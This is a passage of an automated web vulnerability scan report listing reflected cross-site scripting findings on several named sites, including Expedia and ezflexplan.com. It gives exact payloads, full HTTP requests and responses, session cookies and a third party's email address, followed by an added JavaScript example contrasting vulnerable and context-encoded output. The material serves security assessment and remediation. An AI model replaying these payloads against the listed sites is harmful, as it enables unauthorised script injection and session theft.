<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (1054529a<script>alert(1)</script>38d4ed9b16f)
ORDER BY area_name ASC</textarea>
...[SNIP]...

5.117. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ClickContact/js.ashx

Issue detail

The value of the img request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 239be"%3balert(1)//e2bc96337d2 was submitted in the img parameter. This input was echoed as 239be";alert(1)//e2bc96337d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824239be"%3balert(1)//e2bc96337d2 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 653
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:49 GMT; path=/

function load2058797069() {
var load = window.open('http://950b13d4-72fe-46ca-891d-8922b0525b3e.dhmiservices.com/ClickContact/popup.aspx?var1=950b13d4-
...[SNIP]...
<img src=\"http://www.dhmiservices.com/ImageHandler.ashx?img_id=3824239be";alert(1)//e2bc96337d2\" border=\"0\" alt=\"Click to Call\"/>
...[SNIP]...

5.118. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ImageHandler.ashx

Issue detail

The value of the img_id request parameter is copied into the HTML document as plain text between tags. The payload e1fbf<script>alert(1)</script>cf716ce4fbd was submitted in the img_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is served as Content-Type: text/plain; charset=utf-8, so a browser that honours the declared type renders the payload as text rather than executing it; exploitation depends on content sniffing (for example Internet Explorer's MIME sniffing of text/plain bodies). The body is a SQL Server conversion error that echoes the raw parameter, which also shows the value reaches a database query without integer validation and warrants a separate injection test.

Request

GET /ImageHandler.ashx?img_id=3824e1fbf<script>alert(1)</script>cf716ce4fbd HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 118
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:26 GMT; path=/

Conversion failed when converting the nvarchar value '3824e1fbf<script>alert(1)</script>cf716ce4fbd' to data type int.

5.119. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c was submitted in the REST URL parameter 7. This input was echoed as 7db69<img src=a onerror=alert(1)>eafdbdd941c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the copy of the payload in the page body is upper-cased (ALERT(1)); JavaScript identifiers are case-sensitive, so that copy will not execute as submitted, and confirming exploitability there needs a handler body that survives case-folding (for example decimal numeric character references, which the browser decodes after the server has changed the case). The other copy, inside the onclick attribute, has its spaces and = characters replaced (<img_src/a_onerror/alert(1)>), which is the same context as the following finding.

Request

GET /main/do/businesses/id/13/category/For%20Businesses7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:25 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:25 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=f83cff2dc826eeb8b7b7b1111afdbdaf3a05433071c0aed34dc444639c5eca8583c4cdbd; Path=/
Content-Length: 23235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<img_src/a_onerror/alert(1)>eafdbdd941c';">
                           FOR BUSINESSES7DB69<IMG SRC=A ONERROR=ALERT(1)>EAFDBDD941C
                       </div>
...[SNIP]...

5.120. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde62"><a>f053602bd88 was submitted in the REST URL parameter 7. This input was echoed as bde62\"><a>f053602bd88 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The \" in the response shows that the application applies JavaScript-string (backslash) escaping to a value that the browser parses first as an HTML attribute; the HTML parser does not treat the backslash as an escape, so the quote still terminates the onclick attribute and the < and > that follow are parsed as markup.

Request

GET /main/do/businesses/id/13/category/For%20Businessesbde62"><a>f053602bd88 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:19 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:19 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 23191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<div class="secondary_nav_item" style=" color:#000000; font-size:12px; font-weight:bold; padding-left:18px;" onclick="window.location.href='http://www.dominionenterprises.com/main/do/For_Businessesbde62\"><a>f053602bd88';">
...[SNIP]...

5.121. http://www.expedia.com/pub/agent.dll [date1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the date1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d43e'%3balert(1)//b4e195f70d4 was submitted in the date1 parameter. This input was echoed as 5d43e';alert(1)//b4e195f70d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=5d43e'%3balert(1)//b4e195f70d4&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0135D23A61$F4$B5202000V$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$38zo$D7wYd$94$82$AB$89$FB!e02000`125; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819498`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 109469

<!-- srvpush1 15:38:22(:749) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
t.value=d;
   f.rfrr.value=r;
   f.frtp.value=t;
   f.fcqp.value=q
   f.submit();
   }
   
   function SubmitRdat(q,d,t)
   {
   ResetFltWiz();
   f.qscr.value='flxc';
   f.mnth.value='5/1/2011';
   f.ddat.value='5d43e';alert(1)//b4e195f70d4';
   f.fcqp.value=q;
   f.rdat.value=d;
   if(q)
   f.rfrr.value="-22530";
   else
   f.rfrr.value="-22531";
   f.frtp.value=t;
   f.submit();
   }
   function StartOver()
   {
   f.subm.value= '';
   f.qscr.value
...[SNIP]...

5.122. https://www.expedia.com/pub/agent.dll [selc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the selc request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83116%3balert(1)//53dd1085a0b was submitted in the selc parameter. This input was echoed as 83116;alert(1)//53dd1085a0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. In this case the value is used as a bare numeric argument to selectOne(), so there is no delimiter that output encoding could protect; the fix is to validate the value as an integer before it is written into the script.

Request

GET /pub/agent.dll?qscr=logi&ussl=1&subl=0&lmde=256&selc=383116%3balert(1)//53dd1085a0b&rfrr=-54397&zz=1304739868950 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=litn&&chms=114164&rfrr=-54397&zz=1304739862204
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; 
s1=`0`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`user=v.8,0,EX01CED44CE7p$B7203000$8B$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$9F9o$98X!2$3F$BC$D6$EF$B2u!e02000`378; p1=`gacct=v.1,1,215819496`tpid=v.1,1`group=v.1,0`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`adinf=v.1,215819505|999|1|874F787A276C|||`141

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:51:25 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97453


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
(i==c&&ef)Foci(ef);
   }
   g_currSel=c;
   }
   }
   
   function SHErr(c)
   {
   var e=getObj("choice1errorid");
   if(e)e.style.display=(1!=c)?"none":"block";
   }
   function SelOptOnLoad()
   {
   selectOne(383116;alert(1)//53dd1085a0b);
   
   }AddLoadFn("SelOptOnLoad()");
//-->
...[SNIP]...
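
As an added example (not code from this report or from any of the sites above), the fragments below rebuild the three script-context reflections of 5.117, 5.121 and 5.122 and the attribute-with-embedded-script reflection of 5.120 in JavaScript, each beside a hardened version. The template strings, function names and the hardened flag are assumptions for illustration; the payloads are the ones recorded in those findings. The point the findings share is that encoding must match the context the browser parses, and where two contexts nest (5.117: HTML inside a JS string; 5.120: a JS string inside an HTML attribute) the encodings are applied in the reverse of the order in which the browser decodes them.

```javascript
// Added example: context-aware output encoding for the reflection contexts
// recorded in findings 5.117, 5.120, 5.121 and 5.122. Template strings and
// function names are hypothetical stand-ins for the affected pages.

// Payloads as recorded in the findings above (constructed test input).
const PAYLOADS = {
  jsDoubleQuoted: '239be";alert(1)//e2bc96337d2',   // 5.117
  htmlAttribute: 'bde62"><a>f053602bd88',           // 5.120
  jsSingleQuoted: "5d43e';alert(1)//b4e195f70d4",   // 5.121
  unquotedJs: '383116;alert(1)//53dd1085a0b',       // 5.122
};

// HTML text / attribute context: entity-encode the five metacharacters.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: escape every character outside
// [A-Za-z0-9] as \xHH or \uHHHH, so neither quote style, a line terminator
// nor "</script>" can terminate the literal or the enclosing script block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// 5.117: the value sits in a double-quoted JS string whose content is HTML
// that is later written to the document. The browser decodes the JS string
// first and parses the HTML second, so encode HTML first and JS second.
function renderClickToCall(img, hardened) {
  const v = hardened ? encodeForJsString(encodeForHtml(img)) : img;
  return 'var html = "<img src=\\"' + v + '\\" border=\\"0\\" alt=\\"Click to Call\\"/>";';
}

// 5.121: plain single-quoted JS string assignment.
function renderDdat(date1, hardened) {
  const v = hardened ? encodeForJsString(date1) : date1;
  return "f.ddat.value='" + v + "';";
}

// 5.120: a JS string inside an onclick attribute. The HTML parser decodes the
// attribute first and the JS engine reads the string second, so the JS
// escaping is applied first and the HTML entity encoding wraps it.
function renderNavItem(category, hardened) {
  const v = hardened ? encodeForHtml(encodeForJsString(category)) : category;
  return '<div class="secondary_nav_item" onclick="window.location.href=\'/main/do/' + v + '\';">';
}

// 5.122: an unquoted JS expression. There is no delimiter to escape, so the
// only defence is to reject anything that is not the expected integer.
function renderSelectOneCall(selc) {
  if (!/^\d{1,9}$/.test(String(selc))) {
    throw new Error('selc must be a decimal integer');
  }
  return 'selectOne(' + Number(selc) + ');';
}

// True when the rendered fragment still carries the exact breakout sequence
// the scanner observed; lets the two code paths be compared side by side.
function stillReflectsRaw(rendered, payload) {
  return rendered.includes(payload);
}
```

Run under Node: renderClickToCall(PAYLOADS.jsDoubleQuoted, false) reproduces the `";alert(1)//` breakout from the response above, while the hardened path emits 239be\x26quot\x3b\x3balert\x281\x29... which the JS engine turns back into the literal text 239be&quot;;alert(1)//... and the HTML parser then renders as an attribute value. For 5.122, renderSelectOneCall rejects the recorded payload outright rather than trying to encode it.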

5.123. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e5ba"><script>alert(1)</script>b96358f5505 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba"><script>alert(1)</script>b96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 962
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name="leftnav" src="/ContentPages/nav_4e5ba"><script>alert(1)</script>b96358f5505" marginwidth="0" marginheight="0"
scrolling="auto" frameborder="no">
...[SNIP]...

5.124. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1212"><script>alert(1)</script>9703c6d326e was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the surrounding markup entity-encodes & as &amp; but leaves ", < and > untouched, so the encoding applied is for the URL's query separators rather than for the HTML attribute context the value is written into.

Request

GET /navigation/frameset.asp?id=lbmc&email=d1212"><script>alert(1)</script>9703c6d326e&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 866
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=lbmc&amp;email=d1212"><script>alert(1)</script>9703c6d326e&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

5.125. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 113a5"><script>alert(1)</script>cc1a308a602 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=113a5"><script>alert(1)</script>cc1a308a602&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 892
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=113a5"><script>alert(1)</script>cc1a308a602&amp;email=tmangrum@lbmc.com&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

5.126. http://www.ezflexplan.com/navigation/menu.asp [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7284e"><script>alert(1)</script>0b95bf251de was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/menu.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3118
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
